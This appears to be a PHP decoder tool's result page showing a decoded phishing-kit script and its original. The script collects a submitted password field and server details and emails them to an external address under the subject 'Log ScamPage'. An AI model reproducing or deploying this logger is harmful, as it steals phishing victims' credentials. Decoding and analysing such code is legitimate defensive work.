Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Gree..
Decoded Output download
<?php
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "GreeTz : ShadowHunterz - LulzSecurity - Spammer ID - CodeNinja
".htmlspecialchars($tacfgd['pword'])."
Message:
"."
E-server: ".htmlspecialchars
($_SERVER['REQUEST_URI'])."
E-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."
IP:
";
mail("[email protected]","Log ScamPage http://$web$inj", "$body");
?>
Did this file decode correctly?
Original Code
<?php
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "GreeTz : ShadowHunterz - LulzSecurity - Spammer ID - CodeNinja
".htmlspecialchars($tacfgd['pword'])."\nMessage:\n"."\nE-server: ".htmlspecialchars
($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
";
mail("[email protected]","Log ScamPage http://$web$inj", "$body");
?>
Function Calls
| htmlspecialchars | 1 |
Stats
| MD5 | fa610c7ced2acc8b98722e7320d2b5fb |
| Eval Count | 0 |
| Decode Time | 87 ms |